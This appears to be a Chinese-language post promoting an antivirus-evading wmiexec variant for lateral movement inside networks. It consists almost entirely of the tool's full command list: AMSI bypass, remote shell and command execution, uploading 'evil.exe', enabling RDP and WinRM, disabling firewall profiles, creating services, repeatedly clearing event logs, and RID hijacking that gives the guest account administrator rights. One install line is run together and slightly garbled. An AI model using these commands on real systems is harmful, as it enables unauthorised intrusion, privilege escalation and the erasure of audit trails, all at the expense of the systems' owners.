新一代免杀版wmiexec用于内网横向

git clone https://github.com/fortra/impacketcd imapcket && sudo pip3 install .git clone https://github.com/XiaoliChan/wmiexec-Pro

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h
Basic enumeration:   python3 wmiexec-pro.py administrator:password@192.168.1.1 enum -run
Enable/disable amsi bypass:   python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable   python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -disable
Execute command:   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is with output mode)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output in old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output and save output to file)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove temporary class for command result storage)   Filetransfer:   python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./evil.exe" -dest-file "C:windowstempevil.exe" (Upload file over 512KB)   python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:windowstempevil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)   python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove temporary class for file transfer)   RDP:   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto configure firewall)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)
WinRM (Only support win7+):   python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable   python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -disable
Firewall (Only support win8+):   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)   Services:   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:windowssystem32calc.exe'   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:windowssystem32calc.exe' -class "Win32_TerminalService" (Create service via alternative class)   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.json
Eventlog:   python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Looping cleaning eventlog)   python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop looping cleaning eventlog)
RID Hijack:   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate user)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate user)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank password login)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (This will save user profile data as json file)   python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)   python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)